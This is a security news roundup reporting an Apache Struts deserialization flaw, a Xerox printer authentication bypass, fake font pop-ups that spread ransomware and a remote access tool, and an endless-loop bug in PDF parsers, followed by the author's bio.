Critical Vulnerability Found in Apache Struts

A critical vulnerability has been found and patched in the widely used Apache Struts web development framework. The vulnerability is located in the popular REST communication plugin and can lead to remote code execution on affected servers.

The vulnerability was found by researchers from lgmt.com, a service used to analyze the code of open-source projects. It stems from deserialization of untrusted data, a known source of vulnerabilities for Java-based web applications.

The Apache Struts developers fixed the flaw in Struts version 2.5.13, released Tuesday, and users are advised to upgrade as soon as possible because attackers have exploited Struts vulnerabilities in widespread attacks in the past.

Apache Struts is used by companies and organizations from many industry sectors to build corporate websites and other Java-based web applications.

Authentication bypass in Xerox printers

Printer manufacturer Xerox has worked in recent years to secure the firmware and configuration update functionality in its products, but some printer models are still vulnerable to data hijacking.

Security researchers from the Fraunhofer Institute for Communication, Information Processing and Ergonomics FKIE in Germany found that some Xerox printer models still allow their configuration to be changed by sending a file as a print job on a specific communications port.

This action does not require authentication and while it can’t be used to execute arbitrary code on the device, it can be used to inject a rogue iptables file. Such a file could modify the rules of the firmware’s kernel firewall and could forward all print jobs received by the printer to the attacker, leading to potential leaks of sensitive information.

According to the Fraunhofer Institute researchers, Xerox responded to their report by saying that this is a legacy feature provided for convenience to customers. The company has begun adding an option to turn off this functionality in newer products, but the researchers recommend disabling the firmware update and configuration cloning features on older models.

Rogue font pop-ups spread malware

Attackers are increasingly relying on a web-based social engineering trick to infect computers with malware. The technique involves loading malicious JavaScript code on compromised websites to make their content appear scrambled inside browsers and to ask users to download a missing font. The font is actually malware.

The so-called “HoeflerText” font method was first documented in January by researchers from Proofpoint in connection to attack campaigns launched by a cybercriminal gang known as EITest.

More recently, the technique has been used to distribute a new version of the Locky ransomware and a commercial remote access tool (RAT) called NetSupport Manager. Users of Google Chrome and Mozilla Firefox seem to be specifically targeted.

“Users should be aware of this ongoing threat,” researchers from security firm Palo Alto Networks said Friday in a blog post. “Be suspicious of popup messages in Google Chrome that state: The ‘HoeflerText’ font wasn’t found. Since this is a RAT, infected users will probably not notice any change in their day-to-day computer use. If the NetSupport Manager RAT is found on your Windows host, it is probably related to a malware infection.”

Most PDF viewers exposed to 6-year-old endless loop flaw

Code bugs that can cause endless loops leading to application crashes or abnormal CPU resource utilization are serious issues, even though they don’t have security implications beyond denial-of-service.

Such a bug was recently found by German security researcher Hanno Böck of the Fuzzing Project in five different PDF parsing projects: QPDF, PDF.js (used in Mozilla Firefox), PDFium (used in Chrome), Ghostscript and the PDF library used in Microsoft Edge. Adobe Reader and the native PDF viewer in macOS were not affected.

What’s interesting about this bug is that the exact same issue was reported and fixed in a different PDF parsing library in 2011. It turns out that despite the problem being known, other PDF parsing libraries never tested for it.

“It is remarkable that a bug that was discovered six years ago affected the majority of widely used PDF implementations,” Böck said Sunday in a blog post. “But it falls into a pattern of IT security: Very often discovering security issues means rediscovering old issues. In general, this is a difficult problem to solve, as it touches complex questions about knowledge transfer.”

Lucian Constantin

Lucian has been covering computer security and the hacker culture for almost a decade, his work appearing in many technology publications including PCWorld, Computerworld, Network World, CIO, CSO, Forbes and The Inquirer. He has a bachelor’s degree in political science, but has been passionate about computers and cybersecurity from an early age. Before he chose a career in journalism, Lucian worked as a system and network administrator. He enjoys attending security conferences and delving into interesting research papers. You can reach him at lucian@constantinsecurity.com or @lconstantin on Twitter. For encrypted email, his PGP key’s fingerprint is: 7A66 4901 5CDA 844E 8C6D 04D5 2BB4 6332 FC52 6D42

lucian-constantin has 47 posts and counting.See all posts by lucian-constantin